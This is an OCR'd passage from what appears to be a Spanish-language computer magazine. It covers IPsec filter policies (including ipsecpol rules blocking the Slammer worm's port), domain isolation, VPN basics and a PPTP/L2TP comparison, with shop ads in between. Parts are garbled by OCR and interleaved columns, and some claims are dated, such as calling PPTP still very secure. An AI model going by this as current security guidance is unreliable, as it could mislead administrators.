ar tráfico de entrada, así que sus políticas de IPsec bloquearí- 
an solamente tráfico de salida. Windows 2000 no incluye un fi- 
rewall así que usted debe considerar las políticas de IPsec que 
bloquean el tráfico de entrada y de salida. Considere el gusano 
“Slammer”. Slammer buscaba computadoras que fuesen servi- 
dores SQL o MSDE y por lo tanto estarían escuchando el puerto 
UDP 1434. Parchear todas las computadoras puede tomar 
cierto tiempo, así que una mitigación excelente es utilizar la po- 
lítica de grupo para asignar rápidamente una política de IPsec 
a todas las computadoras para bloquear el tráfico de entrada en 
el puerto vulnerable. Para evitar que una computadora sea in- 
fectada por Slammer, usted puede asignar una política que 
bloquee todo el tráfico de entrada desde y hacia el puerto 
destino 1434/UDP: 

Lista de filtros con un filtro: de cualquier dirección : cualquier 
puerto a mi dirección : 1434/udp 

Acción del filtro: bloquear 

Regla: Enlazar la lista con la acción; todas las interfaces; ningún 
túnel; cualquier método de autentificación (no importa porque 
aquí no hay asociación de seguridad de lPsec) 


Se puede también scriptear las políticas de IPsec usando las 
herramientas de líneas de comando. Hay tres herramientas di- 
ferentes que usted puede utilizar dependiendo de su sistema o- 
perativo. Para Windows 2000, la herramienta es 
ipsecpol.exe del Resource Kit; para Windows XP, es ip- 
seccmd .exe de la carpeta de herramientas de soporte en el 
CD-ROM o con una descarga; para Windows 2003 Server, es 
netsh ¡ipsec, incluido con el sistema operativo (véase el final 
de este artículo los enlaces). Usted puede aplicar el filtro de 
Slammer en Windows 2000 con este comando: 


ipsecpol -w REG -p “Block UDP 1434 Filter” -r 
“Block Inbound UDP 1434 Rule” -f *=0:1434:UDP - 
n BLOCK -x 


(en Windows XP el comando es ipseccmd con la misma sinta- 
xis.) Este comando crea y asigna una política estática llamada 
“Filtro de bloqueo UDP 1434 * con una sola regla llamada “regla 
de bloqueo entrada del UDP 1434 * que contiene la misma lista 
del filtro según lo arriba ligado a una acción de filtro de 

“bloque”. Las políticas estáticas se almacenan en el registro » 


y persistirán entre reinicios. La política no se aplicará hasta el 
próximo reinicio del equipo o del agente de las políticas de 
IPsec. Si usted quiere que la política se aplique inmediatamen- 
te, su script debería también parar y reiniciar el servicio llamado 
“policyagent.” 

En el caso de que una computadora se infecte con Slammer, se 
puede usar otro filtro IPsec para evitar que infecte a otras com- 
putadoras, bloqueando la salida del puerto destino UDP 1434: 

Lista de filtros con un filtro: de mi dirección : cualquier puerto a 
cualquier dirección : 1434/udp 

Acción del filtro: bloquear 

Regla: Enlazar la lista a la acción; todas las interfaces; ningún 
túnel; cualquier método de autentificación (no importa porque 
aquí no hay asociación de seguridad de lPsec) 


Observe la sutil diferencia aquí: en la primera regla la lista del 
filtro es de cualquier dirección: cualquier puerto a mi dirección: 
1434/udp; en la segunda regla la lista del filtro es de mi direc- 
ción: cualquier puerto a cualquier dirección: 1434/udp. La 
segunda regla bloquea cualquier tráfico de salida que sea des- 
tinado para el puerto UDP1434 en cualquier computadora. 
Utilice este comando para scriptear esa regla y agregarla a la 
misma política que la primera: 


ipsecpol -w REG -p “Block UDP 1434 Filter” -r 
“Block Outbound UDP 1434 Rule” -f 0=*:1434:UDP 


-n BLOCK 
Omita el “-x” aquí porque este comando está agregando otra 


regla a la política existente. 

Usted puede también utilizar las utilidades de las líneas de 
comando para aplicar políticas dinámicas (éstas permanecen 
en efecto siempre y cuando el sistema está funcionando). Se 
pierden si se reinicia el agente de políticas o la computadora. 
Estos dos comandos crearán una política dinámica que haga lo 
mismo que la política estática arriba: 


ipsecpol -f[*=0:1434:UDP] 
ipsecpol -f[0=*:1434:UDP] 


Los corchetes alrededor de la especificación del filtro indican 
que éste es el tráfico que el motor de la política debería bloque- 
ar. Hemos estado explorando hasta ahora cómo utilizar IPsec 
para bloquear tráfico desde y hacia los “malos” destinos cono- 
cidos. Usted podría ser más restrictivo con sus políticas de 
IPsec y bloquear todo el tráfico, y después crear reglas que per- 
mitan cierto tráfico a ciertas localizaciones. Necesitará pensar 
muy cuidadosamente qué clase de tráfico se debe permitir. 
Planee extensivamente, y pruebe a fondo sus ideas antes de 
lanzarse en la producción. ¡Espere que las cosas no funcionen 
al principio! 


Utilizando IPsec para proteger servidores 


Un muy buen uso de la política “bloquear-todo-excepto” es para 
la protección del servidor. Digamos que usted está armando un 
servidor Web. ¿Por qué debe ese servidor aceptar tráfico de 
entrada que no sea tráfico Web, por lo menos en su conexión a 
Internet (si es dual)? Usted puede utilizar una política de IPsec 
para construir un filtro rudimentario de paquetes que deseche 
todo excepto lo que tenga sentido, a los propósitos de su servi- 
dor, en el ejemplo del servidor Web, todo excepto el tráfico des- 
tinado por TCP para el puerto 80 (y 443 si algunas páginas uti- 
lizan HTTPS). 


ATTE 


Tales políticas le ahorran tiempo de probar y desplegar patches. 
Si alguien descubre una vulnerabilidad en el sistema operativo 
pero una política de IPsec no está permitiendo el acceso al ser- 
vicio vulnerable, usted puede desplegar estas políticas para 
permitirse tiempo adicional de probar y de desplegar el patch de 
acuerdo a su agenda. Continuemos el ejemplo del servidor del 
Web. Su política de IPsec tendría dos reglas: 

Regla 1 

Lista de filtros con un filtro: de cualquier dirección: cualquier 
puerto a mi dirección: cualquier puerto. 

Acción del filtro: bloquear. 

Regla: Enlazar la lista a la acción; todas las interfaces; ningún 
túnel; cualquier método de autentificación (no importa porque 
aquí no hay asociación de seguridad de lPsec) 


Regla 2 

Lista de filtros con dos filtros: de cualquier dirección: cualquier 
puerto a mi dirección:80/TCP y de cualquier dirección: cualquier 
puerto a mi dirección:443/TCP 

Acción del filtro: permitir. 

Regla: Enlazar la lista a la acción; todas las interfaces; ningún 
túnel; cualquier método de autentificación (no importa porque 
aquí no hay asociación de seguridad de lPsec) 


Para scriptear esto, utilice estos comandos: 


ipsecpol -w REG -p “Allow web Traffic” -r 
“Block Everything” -f *+0 -n BLOCK -x 

ipsecpol -w REG -p “Allow web Traffic” -r 
“Permit Inbound TCP 80” -f *+0:80:TcP -f 
*+0:443:TCP -n PASS 


Note en estos ejemplos que “+” substituye a “=” entre la fuente 
y las especificaciones del destino dirección/puerto/protocolo. 
Esto le dice al agente de políticas que construya las reglas en 
“espejo” que se requieren para el tráfico de respuesta para a- 
bandonar el servidor Web. Sin el espejo, usted necesitaría 
reglas separadas permitiendo el tráfico de salida de los puertos 
80 y 443 del servidor. Cuando usted crea reglas en el GUI se 
reflejan automáticamente. 

Piense en los roles de varios servidores en su organización y 
comience a desarrollar las políticas de |Psec que son apropia- 
das para esos roles. Utilice las políticas de grupo para asignar 
las políticas de |Psec basadas en las unidades de organización 
(OU - Organizational Unit) que reflejan cada rol. Estas políticas 
pueden ayudar mucho a aumentar la seguridad de su entorno 
simplemente poniendo un método en ejecución para limitar el 
tráfico que pueda entrar en el servidor. 


Utilizando IPsec para aislamiento del dominio 


Si usted está utilizando Active Directory, sabe quiénes son sus 
usuarios: se tienen que autenticar cuando desean utilizar recur- 
sos de la red. ¿Pero qué hay sobre las computadoras? Seguro, 
algunas de las computadoras se unen a su dominio. Aunque la 
arquitectura de Windows no requiere esto. Mientras un usuario 
posee las credenciales válidas, accede a los recursos de la red 
desde cualquier computadora en la red. ¡Y el Windows XP 
Credencial Manager le hace más fácil el hecho de convivir con 
una computadora no unida al dominio! 

El concepto del “aislamiento del dominio” se está volviendo 
cada vez más popular. Comenzamos a mencionarlo a »> 
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finales de 2001; ahora está funcionando a través de todas las 
redes corporativas de Microsoft y en las redes de muchos clien- 
tes. Si aún no lo ha considerado, lo animamos a que piense en 
él ahora. AL final de este artículo hay un enlace a una guía más 
detallada basada en nuestro despliegue. 

El aislamiento del dominio es importante por muchas razones, 
las computadores que se unen al aislamiento del dominio son 
computadores en las que puede confiar casi totalmente, ya que 
puede aprovecharse de cosas como las políticas de grupo, 
plantillas de seguridad, configuración de restricciones de soft- 
ware, políticas de |Psec, Microsoft Systems Management 
Server (SMS), y cualquier otra tecnología de seguridad relacio- 
nada a la seguridad que pueda controlar y manejar centralmen- 
te. Las computadoras cuya configuración controla son compu- 
tadoras que hacen solamente lo qué usted permite que hagan. 
Éstas computadoras serán menos peligrosas en su entorno que 
las máquinas de las cuales usted no tiene ningún conocimiento 
sobre su existencia o sus configuraciones. 

Aquí esencialmente está diciendo que ningún usuario puede le- 
vantar una computadora no autorizada y acceder a los recursos 
de la red — sólo las computadoras autorizadas pueden comuni- 
carse con otras computadoras autorizadas. Es más fácil de lo 
que piensa implementar esto en su dominio. Primero agregue 
esta política de IPsec a las políticas de grupo del dominio por 
defecto (default Domain Group Policy): 

Lista de filtros: utilice la lista de filtros de ejemplo de todo tráfico 
IP existente (all IP traffic). 

Acción del filtro: sólo ESP, cifrado nulo, integridad SHA-1; re- 
quiera la seguridad; no se comunique con máquinas no-lPsec 
Regla: Enlazar la lista a la acción; todas los interfaces; ningún 
túnel; Autentificación de Kerberos; ninguna respuesta por 
defecto 


Puede usar tanto AH como ESP, pero su política no funcionaría 
con dispositivos que deban comunicarse a través de traducto- 
res de direcciones de red (NAT). Necesitará crear una regla que 
exima sus controladores de dominio porque necesita comuni- 
carse con ellos para autenticar y acceder al ticket de Kerberos 
que se utiliza para todas las otras comunicaciones: 

Lista de filtros: Filtrar con las direcciones o los rangos de direc- 
ciones de sus controladores de dominio. 

Acción del filtro: permitir 

Regla: Enlazar la lista a la acción; todas las interfaces; ningún 
túnel; cualquier método de autentificación (no importa porque 
aquí no hay asociación de seguridad de lPsec) 


Una vez que pruebe y despliegue estas políticas, las máquinas 
fuera del dominio no podrán comunicarse con cualquier 
máquina unida a un dominio. ¿Por qué? Los miembros del 
dominio requerirán IPsec. Usted no puede acceder a la política 
a menos que se una al dominio. Usted no puede “hacer su 
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propia” política e intentar permanecer fuera del dominio porque 
la política requiere Kerberos, que trabaja solamente si usted 
está en el dominio. Todos los miembros del dominio recibirán la 
política y por lo tanto podrán comunicarse con el resto de los 
miembros del dominio. Recuerde que si permite que los usua- 
rios agreguen y quiten sus máquinas de su dominio, no podrá 
controlar quién recibe o no la política. Observe que esto no es 
necesariamente un problema siempre y cuando unirse al 
dominio aplique otros controles de seguridad como SMS, anti- 
virus, anti-spyware, firewall, etcétera. 


Una tecnología para enamorarse 


Espero que esta serie de dos partes lo haya entusiasmado 
acerca de las cosas que puede hacer con esta increíble tecno- 
logía. Lo invitamos a enviar sus opiniones, por favor utilice el 
enlace al final de esta columna. Gracias por leernos y disfrute 
la experiencia con lPsec. 


Este artículo también apareció en inglés en "Microsoft 
Security Newsletter (gratuito) al que recomendamos 


suscribirse. 


www.microsoft.com 


Enlaces 
SRP (Software Restriction Policies  - Políticas de 
Restricción de Software) 


http://www.microsoft.com/resources/documentation/win- 
dowsserv/2003/all/deployguide/en-us/dmebg_dsp_cnyd.asp 


http: //www.microsoft.com/resources/documentation/windows- 


serv/2003/all/deployguide/en-us/dmebg_dsp_mawi.asp 


http://www.microsoft.com/technet/prodtechnol/winxppro/main- 
tain/rstrplcy.mspx 


Herramientas líneas de comando de lPsec 


Windows 2000 Resource Kit: 
http://www.microsoft.com/windows2000/techinfo/reskit/default.a 


sp 

Windows XP Service Pack 2 Support Tools: 
http://support.microsoft.com/?kbid=838079 
Aislamiento de Dominio en Microsoft 


http://www.microsoft.com/technet/itsolutions/msit/security/ipsec- 
domisolwp.mspx ¿4 
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INSUMOS DE PC Locales 427-428-446-449 1%piso 
Monitores, Impresoras, Scanners, Parlantes, Multimedia. 
Servicio Técnico, Actualizaciones, Equipos a Medida. 
eagugelnuevosOdatamarkets.com.ar 


CONECTIVIDAD Locales 431-433-423 1? piso 
Cables, Adaptadores, Conectores, Estabilizadores, UPS 
Electroquimicos, Redes, Wireless, Cables a Medida. 
eagugelconectividadOdatamarkets.com.ar 


COMPRA VENTA USADOS Local 434 1*piso 
Compra y venta de Insumos de Pc, Reparaciones, 
Actualizaciones, Equipos a Medida. 
eagugelusados(Ddatamarkets.com.ar (4322-1925) 


NOTEBOOKS Locales 430 1? piso y 416 PB 
Compra y venta de Notebooks, Insumos, Accesorios, 
Bolsos. Servicio Técnico, Reparación y Mantenimiento. 
eagugelnotebooksOdatamarkets.com.ar (4327-0110) 


REDES Local 432 1? piso 

Racks, Switches, Hubs, Routers, Insumos, Cableados. 
Configuración de MDF e IDF, Redes Wireless. 
eagugelconectividadOdatamarkets.com.ar (4322-1925) 
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Tel. 4327-1648 / 4326-2217 Tel/Fax 4328-3529 


Introducción 


a VPNs (Virtual Private Networks) 


Por Carlos Vaughn O'Connor 


¿Qué significa VPN? 


Un “Virtual Private Network” (VPN) es una red (network) de 
datos privada (es decir, sólo participan un grupo “elegido” de 
computadoras), que utiliza la infraestructura de telecomunica- 
ciones pública, manteniendo la privacidad a través de protoco- 
los de túneles y procedimientos de seguridad. Una empresa 
puede querer que sus empleados se conecten a su red desde 
sus hogares o cuando están viajando, o podría querer que dos 
sucursales (cada una con su propia LAN) estén conectadas en 
una sola red. La VPN brinda a una empresa las mismas posi- 
bilidades que las líneas priva- 
das bajo leasing a un costo 
muchísimo más bajo, utilizan- 
do la infraestructura pública 
compartida (un ejemplo: 
Internet). 


Bajo las siglas VPN se reúne 
un conjunto de tecnologías y 
escenarios para satisfacer las 
necesidades de las empresas. 


Cuando se selecciona una im- 
plementación VPN se deben 
considerar: seguridad, intero- 
perabilidad, facilidad de uso y 
administración. Existen solu- 
ciones VPN provistas por dife- 
rentes vendors (por ejemplo 
CISCO), pero también existen 
soluciones ya incluidas en di- 
ferentes sistemas operativos 
(SO) -por ejemplo: Windows o 
Linux-. O soluciones que si no 
están ya en el SO pueden 
bajarse de Internet. 


nn 


En este artículo se discute la 
tecnología VPN en su forma 
genérica. independiente de 
cómo se las implementa. Para 
entender VPNs es necesario 
adentrarse en los siguientes puntos (que son desarrollados en 
gran detalle en diferentes artículos en esta edición): 


prono» 


Protocolos disponibles (PPTP/ L2TP/ IPSec, IPSec Túnel) 
Escenarios VPNs más comunes (Acceso remoto, site-to-site, 
extranet) 

Autenticaciones 

Seguridad bajo VPN 


En el caso Windows, si nos referimos a un servidor VPN se 
deberá entender Windows 2000 Server o Windows Server 2003 
con RRAS (Routing and Remote Access) activado. 
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Fig. 1 VPN y Acceso remoto 


Servidor Exchange 


Los dos escenarios más comunes de 
VPNs 


VPNs y Acceso Remoto (Remote Access 
VPN) 


La mayoría de las compañías necesitan proveer acceso remoto 
a los empleados. Generalmente se utilizaba una conexión dial- 
up (DUN) del cliente al servidor de acceso remoto (RAS) vía 
módems. Para acceso remoto VPN hay que considerar: tecno- 
logía en la Workstation cliente, 
qué sucede en el medio entre el 
cliente y el servidor VPN, el ser- 
vidor VPN y finalmente la rela- 
ción con el usuario remoto. El 
usuario remoto puede ser un 
RA empleado o individuo de menor 

confianza (un consultor o socio 
de negocios). Usualmente, el 
cliente de la Workstation estará 
corriendo bajo el SO Windows, 
pero podrá ser una estación 
MAC, Linux o Unix. 


Dos consideraciones son im- 
portante destacar: 1). recordar 
que el ancho de banda deberá 
ser apropiado para que la cone- 
xión tenga sentido. 2). normal- 
mente los proveedores de 
Internet (ISP) no bloquean los 
protocolos que se utilizan. Sólo 
puede haber problemas en el 
caso de que el usuario remoto 
trate de conectarse al VPN 
server (vía Internet) desde 
dentro de una red (un emplea- 
do visitando un cliente o prove- 
edor) y deba pasar un firewall. 
Para este tipo de situaciones, 
una solución es un http-tunnel, 
como el propuesto e www.http-tunnel.com, que permite llegar a 
Internet vía el puerto 80 de http y entonces establecer el túnel 
VPN. Una vez que el usuario remoto “disca” al número IP del 
servidor VPN se ingresa a la etapa de autenticación y autoriza- 
ción. Básicamente: ¿quién es usted?: Nombre de usuario y 
password y luego, ¿de qué modo lo autorizo a entrar en la red? 
(horario, protocolo). Toda ésta infraestructura deberá ser confi- 
gurada por el administrador para garantizar seguridad. 

Según el protocolo en uso y el SO en el servidor VPN y usuario 
remoto, existirán diferentes modos de autenticar (passwords 
tradicionales, certificados de usuario, tokens o biométrica). 
Finalmente, se deberá decidir si se desea que el usuario 


Servidor W2K 


remoto pueda acceder a la Intranet o si se lo limitará a áreas es- 
pecíficas. En la Fig. 1, por ejemplo, solamente se da acceso al 
servidor de Exchange. Se puede implementar esta “restricción” 
de diferentes modos: en el Server VPN, en los routers, o en las 
workstations y servers usando IPSec y políticas asociadas. En 
servidores VPN con W2K existe la posibilidad de usar Remote 


Access Policies (RAP). 


SITE-TO-SITE VPNs (VPNSs entre sitios) 


Site-to-site conecta la LAN 
de una empresa ubicada en 
un sitio remoto con otra LAN 
en otra ubicación, usando un 
link VPN a través de Internet, 
reemplazando así líneas de- 
dicadas que en general son 
muy caras. Todo lo que se 
necesita es un servidor W2K 
en cada sitio conectado a la 
LAN local. 

Este escenario no requiere 
autenticación de usuario pero 
sí deben autenticarse los ser- 
vidores VPN entre sí. 
Cuando se establece la co- 
nexión VPN, uno de los servi- 
dores VPN asume el rol de 
cliente e inicia una conexión 
con otro servidor VPN. 
Después de establecida la 
conexión VPN, los usuarios 
de cada sitio puede conectar- 
se a los servidores como si 
estuvieran en la misma red 
local. 


¿Cómo saben los servidores 
VPNs que el otro es auténtico 
y no un impostor? De 
acuerdo con el protocolo y el 
SO instalado en los servido- 
res VPN, se puede basar la 
autenticación site-to-site en 
contraseñas asociadas con 
cuentas de usuario creadas 
para cada servidor, en llaves 


Fig. 2 Site to site VPN 
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Sarñdor VPN 


En IM 


Internet 


Sorddor WAN 
en Casa central 


secretas pre-acordadas o en certificados para cada máquina e- 
mitidos por una autoridad certificadora (CA, Certificate 


Authority). 
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Los Protocolos usados en VPNs. 


Es importante conocer cuáles son los protocolos usados en 
VPNs y como se interrelacionan con las diferentes autenticacio- 


nes posibles. 


Cada una de las dos arquitecturas antes mencionadas soportan 
uno o más protocolos para establecer la VPN. Las posibilidades 


Q 


hoy son PPTP, L2TP/IPsec 
y IPsec Túnel. 


Los distintos protocolos 
permiten diferentes algorit- 
mos de enciptación. 


A su vez diferentes autenti- 
caciones serán posibles en 
cada caso. 


En los artículos que siguen 
se podrá ver esto en 
detalle: 


“PPTP y L2TP” por Ing. 
Marisabel Rodriguez 
Bilardo y: 


“IPsec partes 1 y 2” por 
Steve Ridley, Senior 
Program Manager, Security 
Business and Technology 
Unit, Microsoft Corporation 


IPsec y L2TP representan 
los protocolos más actua- 
les y soportan autenticacio- 
nes que difieren en su nivel 
de riesgo. 


PPTP ha debido ser corre- 
gido en las vulnerabilida- 
des descubiertas por 
Counter Pane Sustems en 
1998 y representa aún hoy 
una opción muy segura 
para requerimientos corpo- 


rativos, siempre que se implementen passwords fuertes 


(strong). 
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Los protocolos PPTP y L2TP nacieron para crear VPN:s. 
Además de permitir crear túneles a través de Internet, pueden 
encriptar los datos enviados y autenticar a los usuarios. 


Las VPNSs conectan sitios remotos en forma segura y además 
bajan costos porque utilizan redes públicas en vez de líneas 
punto a punto. Saber cómo funcionan los protocolos más utili- 
zados con los que se implementan, nos ayuda a aprovechar 
más estos beneficios. 


VPNs 


El término VPN se usa en los últimos años en forma muy 
general, para designar una muy variada gama de implementa- 
ciones. Básicamente se refiere a lograr que las comunicaciones 
entre determinadas redes o computadoras, sean virtualmente 
invisibles para observadores externos, mientras que se aprove- 
chan las ventajas de infraestructuras públicas. Lo que distingue 
a una VPN de una red privada verdadera es la utilización de 
una infraestructura compartida. La base de la aparición de las 
VPNs reside en la economía y la seguridad en las comunicacio- 
nes. 


En este artículo, nos vamos a referir a las VPDN Lo que distingue 
(Virtual Private Dial-up Networks). Una VPDN 2 una VPN de 


permite a un usuario remoto conectarse a otro sitio 
bajo demanda mediante un túnel ad hoc. 


El usuario se conecta a una red pública vía dial-up o Verdadera es la 
un link ISDN, y luego sus paquetes viajan en un túnel utilización 


a través de la red pública, dando la impresión de que 
está conectado al sitio destino directamente. Una ca- 


los de red sobre el link PPP. 
PPTP y L2TP son idénticos en la capa física y de enlace, pero 
sus similitudes terminan ahí. 


PPTP 


El protocolo PPTP encapsula paquetes IP para transmitirlos en 
una red IP. Los clientes PPTP usan el puerto destino 1723 para 
crear un túnel. Este proceso tiene lugar en la capa de transpor- 
te. Después de que el host y el cliente establecen un túnel, 
envían paquetes de control de conexión PPTP de un extremo al 
otro para mantenerlo. 

PPTP encapsula el frame PPP en un paquete GRE (Generic 
Routing Encapsulation) que opera en la capa de red. GRE 
provee un método de encapsulamiento a los protocolos de capa 
3 como IPX, Apple Talk, y DECnet para redes IP, pero no esta- 
blece una sesión ni provee seguridad. Para eso se usa PPTP. 
Usando GRE, se restringe el uso de PPTP a redes 
basadas en IP. 

Después de encapsular el frame PPP con un encabe- 


una red privada zado GRE, PPTP encapsula el frame con un encabe- 


zado IP. Este encabezado IP contiene la dirección IP 
origen y destino para el paquete. Luego, PPTP agrega 
de un encabezado y un trailer PPP. 


una infraestruc- Generalmente hay tres dispositivos que intervienen en 


racterística esencial de este tipo de conexiones es la tura compartida. la implementación de una VPN con PPTP: 


necesidad de la autenticación del usuario, ya que 
cualquiera podría tratar de conectarse para obtener acceso al 
sitio usando la misma red. 


Túneles 


El proceso de crear un túnel consiste en enviar paquetes a una 
computadora en una red privada, ruteándolos sobre otra red, 
como por ejemplo Internet. 

Los túneles en sí mismos, no proveen seguridad de datos; el 
paquete original es simplemente encapsulado dentro de otro 
protocolo, pero se puede ver el contenido con cualquier sniffer 
si no está encriptado. Con “encapsular” nos referimos a agregar 
un encabezado y/o un trailer de un protocolo a un PDU (Packet 
Data Unit) que proviene de otra capa del modelo OSI. 


PPP es la base sobre la cual trabajan 


L2TP y PPTP son los protocolos más populares para crear 
VPNs. Al comparar cómo se comportan ambos en el modelo 
OSI, se encuentra una similitud muy importante: PPP es la base 
de ambos y es el encargado de encapsular la transferencia de 
datos. 

PPP es un protocolo de la capa de enlace de datos del modelo 
OSI, que se diseñó en un principio para encapsular datos y en- 
viarlos sobre links punto a punto. 

Un subconjunto de protocolos PPP maneja las operaciones de 
conexión: el LCP (Link Control Protocol), establece, configura, 
mantiene y termina una conexión punto a punto, y el NCP 
(Network Control Protocol) establece y configura varios protoco- 
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Un Cliente PPTP 
Un Network Access Server (lo llamaremos NAS) 
Un Servidor PPTP 
No se necesita un NAS para crear un túnel cuando el Cliente 
PPTP y el Servidor PPTP están en la misma red. 
Una implementación típica de PPTP, comienza con un cliente 
que necesita acceder a una LAN privada usando su conexión a 
la red pública. 
El cliente se conecta a un NAS a través de la infraestructura de 
red del ISP. Un NAS también se puede llamar FEP (Front End 
Processor), dial-in server, o POP (Point of Presence). Una vez 
que se conecta puede enviar y recibir paquetes en Internet. 
Luego de que el usuario hizo una primera conexión al ISP, se 
necesita una segunda llamada que se realiza sobre la conexión 
PPP recién creada en la llamada anterior. Los datos enviados 
en esta segunda conexión son datagramas PPP (paquetes PPP 
encapsulados). 
La segunda llamada crea una conexión virtual privada sobre la 
LAN privada de la Organización, lo cual se da en llamar túnel. 
De esta forma se envían paquetes a una computadora en una 
red privada ruteándolos sobre otra red, que puede ser Internet. 
Los routers de esta otra red no pueden acceder a la computa- 
dora que está en la red privada. Sin embargo, el túnel permite 
a la red origen, hacer llegar los paquetes a un dispositivo de la 
red intermedia como el Servidor PPTP, que se conecta tanto a 
la red que rutea los paquetes como a la red privada. 
Cuando el Servidor PPTP recibe el paquete, lo manda a la com- 
putadora correspondiente en al red privada. El Servidor 
procesa el paquete PPTP para obtener el nombre o la direc- » 


ción de la computadora de la red privada, información que está 
encapsulada en el paquete PPP. El paquete PPP encapsulado 
puede contener varios protocolos como TCP/IP, IPX o NetBEUI. 


L2TP 


L2TP es una combinación de PPTP de Microsoft y un consorcio 
de empresas (entre las que se encuentran US Robotics y 
3COM) y L2F de CISCO. PPTP soporta túneles sobre PPP, y 
L2F permite túneles sobre SLIP y PPP. Después de que CISCO 
diseñara L2F, la IETF (Internet Engineering Task Force) pidió a 
la compañía que combine PPTP y L2F en un protocolo para 
evitar confusiones y permitir la compatibilidad entre productos 
existentes en el mercado. Se supone que L2TP tiene las 
mejores características de cada uno. 

Uno de los mejores avances de L2TP es que corre sobre redes 
no basadas en IP, incluyendo ATM, X.25 y Frame Relay. Sin 
embargo, no se puede contar con esta característica en algunas 
plataformas que solamente soportan IP, como por ejemplo 
Windows 2000. 


Laca da Ord BB - GEI EFE 


Figura 2 


L2TP puede utilizar o no IP Sec para implementar el túnel, pero IPSec 


permite agregar autenticación y encripción. 


Usando L2TP, un ISP u otro servicio de acceso puede crear un 
túnel virtual para unir un sitio remoto con una red privada cor- 
porativa. El LAC (L2TP Access Connector) que se encuentra en 
el POP (Point of Presence) del ISP intercambia mensajes PPP 
con los usuarios remotos y se comunica utilizando mensajes de 
control con el LNS (L2TP Network Server) para configurar el 
túnel. L2TP pasa mensajes de control a través del túnel virtual 
entre los dos extremos de una comunicación punto a punto. 
Un LAC es típicamente un dispositivo ubicado en el POP del 
ISP, y su configuración está a cargo de éste. El LNS es el 
extremo final del túnel, inicia las llamadas salientes y recibe las 
entrantes que vienen del LAC. 


Secuencia de conexión en el establecimiento de 
un túnel L2TP genérico 


La conexión entre un usuario remoto, un LAC, un ISP POP 
y un LNS en la LAN local usando L2TP se lleva a cabo de 
la siguiente manera: 

El usuario remoto inicia la conexión PPP en el ISP, usando 
un teléfono o ISDN. 

El LAC del ISP acepta la conexión en el POP y se estable- 
ce el link PPP. 

Después de que el usuario y el LNS negocian con LCP, el 
LAC autentica parcialmente al usuario con CHAP o PAP 
(Protocolos de autenticación de PPP). Si el usuario no es un 
usuario permitido de la VPDN, la autenticación continúa y el 
usuario va a poder utilizar Internet u otro servicio al que se 
haya conectado. Si el nombre de usuario es un cliente de la 
VPDN, se establece la conexión con el LSN. 

Los extremos del túnel, el LAC y el LNS, se autentican entre sí 
antes de comenzar la sesión del túnel. 

Una vez que se establece el túnel, se crea una sesión L2TP 
para el usuario. 

El LAC va a propagar las opciones negociadas en el LCP, y la 
información de autenticación CHAP o PAP al LNS, quien valida 


AT ES 


estos datos para finalmente crear la conexión virtual. 

Esta negociación resulta para el usuario como si el intercambio 
fuera solamente entre él y el LNS, y no hubiera un dispositivo in- 
termediario como el LAC. 


En qué se basa la seguridad en ambos protocolos 


La VPN se puede establecer a 20 hops de distancia del destino a- 
travesando muchas redes distintas, y sin embargo se configura 
para acceder de manera directa a una LAN privada. ¿Cómo nos 
podemos asegurar de que nadie ajeno a la compañía está viendo 
nuestra información? 

Para dar autenticación de usuario, PPTP usa varios protocolos de 
autenticación basados en PPP, que incluyen Extensible 
Authentication Protocol (EAP), Microsoft Challenge Handshake 
Authentication Protocol (MSCHAP) versión 1 y versión 2, 
Challenge Handshake Authentication Protocol (CHAP), Shiva 
Password Authentication Protocol (SPAP), y Password 
Authentication Protocol (PAP). MSCHAP versión 2 y EAP 
Transport Layer Security (TLS) son más seguros porque proveen 
autenticación mutua, en la cual el Servidor VPN y el cliente 
verifican la identidad de la otra parte. 

La encriptación PPTP asegura que nadie puede ver los datos 
que viajan a través de Internet. MPPE (Microsoft Point to 
Point Encription) negocia la encriptación sobre una conexión 
PPP y puede ser usado solamente con MSCHAP (versión 1 
y versión 2) y EAP-TLS. Se puede utilizar uno de los tres 
métodos de encriptación MPPE: 40 bits, 56 bits, o 128 bits. 
PPTP cambia las claves de encriptación con cada paquete 
recibido. MPPE fue diseñado para enlaces punto a punto en 
donde cada paquete de datos llega secuencialmente y en 
donde pocos paquetes se pierden. En ese entorno, la clave 
de encriptación de un paquete puede depender de la desencripta- 
ción del paquete anterior. 

En el entorno VPN, esta configuración no funciona porque los pa- 
quetes de datos frecuentemente llegan fuera de secuencia. Por 
eso PPTP desencripta paquetes independientemente del orden y 
usa un número de secuencia para alterar las claves de encripta- 
ción para desencriptar el paquete anterior. 

A pesar de que PPTP es razonablemente seguro, no es tan seguro 
como L2TP sobre IPSec. L2TP sobre IPSec provee autenticación 
a nivel de usuario y también encriptación de datos. 

L2TP sobre IPSec utiliza certificados locales en el inicio de la co- 
municación, los mismos se obtienen de una Autoridad Certificante 
(CA). El cliente y el servidor intercambian sus certificados para 
crear la IPSec ESP Security Asociation (SA). 

Después de que L2TP sobre IPSec completa el proceso de auten- 
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Figura 1 


PPTP agrega un encabezado GRE para enviar los datos a través del 
túnel. 


ticación entre cliente y servidor, comienza el proceso de autentica- 
ción a nivel usuario. Se puede elegir autenticación basada en PPP 
(por ejemplo PAP, que manda nombre de usuario y contraseña en 
texto plano). El proceso es todavía seguro porque L2TP sobre 
IPSec encripta la sesión. Sin embargo, se puede autenticar en una 
forma más segura utilizando MSCHAP, que usa una clave de en- 
criptación separada de la que se utiliza a nivel autenticación entre 


máquinas. »> 
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Como L2TP sobre IPSec utiliza el algoritmo Triple Data 
Encription Standard (3DES), la encriptación es mucho más 
fuerte que la que realiza PPTP. 3DES se usa solamente en 
Norteamérica y está diseñado para entornos de alta segu- 
ridad. Si no se necesita este nivel de seguridad, se puede 
utilizar DES, que usa una clave de 56 bits, mientras que 
3DES usa tres claves de 56 bits. 

L2TP sobre IPSec no solamente provee autenticación a 
nivel computadoras y usuarios, sino que también ofrece 
autenticación de datos. Para ello, L2TP sobre |PSec usa 
“Hash Message Athentication Code (HMAC) Message 
Digest” MD5. Con este método crea un hash de 128 bits 
para autenticar la información. 


Conclusión 


Por lo antes expuesto, podemos concluir que las diferen- 
cias a nivel funcional son pocas, y que las ventajas de 
L2TP con respecto a la fortaleza de los protocolos de en- 
criptación y autenticación son realmente superiores a los 
de PPTP. De todas maneras, no olvidemos que algoritmos 
más fuertes de encriptación conllevan también un uso 
intenso de CPU para realizar estas operaciones. 

L2TP es un protocolo que está evolucionando y en su 
versión 3 agrega MPLS (Multiprotocol Label Switching), el 
cual combina información de capas 2 y 3 para flexibilizar 
el tráfico y proveer QoS (Quality of Service). 

Si nuestra Organización implementa VPN y necesita la 
